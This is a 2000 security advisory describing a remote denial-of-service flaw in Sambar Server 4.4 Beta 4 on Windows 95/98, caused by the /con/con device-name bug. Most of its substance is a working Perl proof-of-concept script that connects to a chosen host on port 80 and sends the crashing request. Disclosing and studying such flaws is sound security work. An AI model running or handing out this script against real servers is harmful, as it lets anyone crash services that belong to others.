The Sambar Server v4.4 Beta 4 for Windows 95/NT is vulnerable to a remote denial of service attack due to the con/con bug. Perl proof of concept code included.
55be48679e17a74e5287e6a851ca595e4a6e8b5e87adc6609febe7527a7324fa
daemon-root's security research
Advisory Name: dae_sambar44b4
Release Date: 10 November 2000
Application: Sambar Server 4.4 Beta 4 Windows (http://www.sambar.com)
Platform: Windows 95, 98
Severity: The server is still vulnerable for the infamous /con/con exploit
Author: daemon-root (daemon_r00t@secureroot.com)
Web: http://www.daemon-root.da.ru
Overview:
Sambar Server is a free, multithreaded HTTP server for Windows 95/NT.
Its features include HTTP proxy, search engine, log analysis, security,
server-side scripting, and DLLs. This program includes an unbuffered CGI support,
native FTP proxy, a sacrypt encryption utility, and significantly faster
full-text indexing, yet it's still vulnerable for the infamous /con/con exploit
such as in the previous versions of Sambar Server.
Proof of concept code:
[dae_sambar44.pl]
# Sambar Server 4.4 Beta 4 Windows /con/con Exploit
#
# Bad Perl Code by: daemon-root
# Website: http://www.daemon-root.da.ru
#
# This is for EDUCATION purposes ONLY!
use IO::Socket;
print "Sambar Server 4.4 Beta 4 Windows /con/con Exploit\n";
print "=================================================\n";
if (not $ARGV[0]) {
print "Usage: $0 [host]\n\n";
exit(0);
}
sub connecthost {
$host = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $ARGV[0],
PeerPort => "80",) or die "Can't open connection to $ARGV[0] because $!\n";
$host->autoflush(1);
}
$exploit .= "/con/con";
print "\nOpen connection...\n";
&connecthost;
print "Sending characters...\n";
print $host "GET $exploit HTTP/1.0\n";
print "close connection...\n";
close $host;
[END OF dae_sambar44.pl]
Vendor status:
The vendor has been informed on 10 november 2000.
______________________________________________________________
daemon-root's security research - http://www.daemon-root.da.ru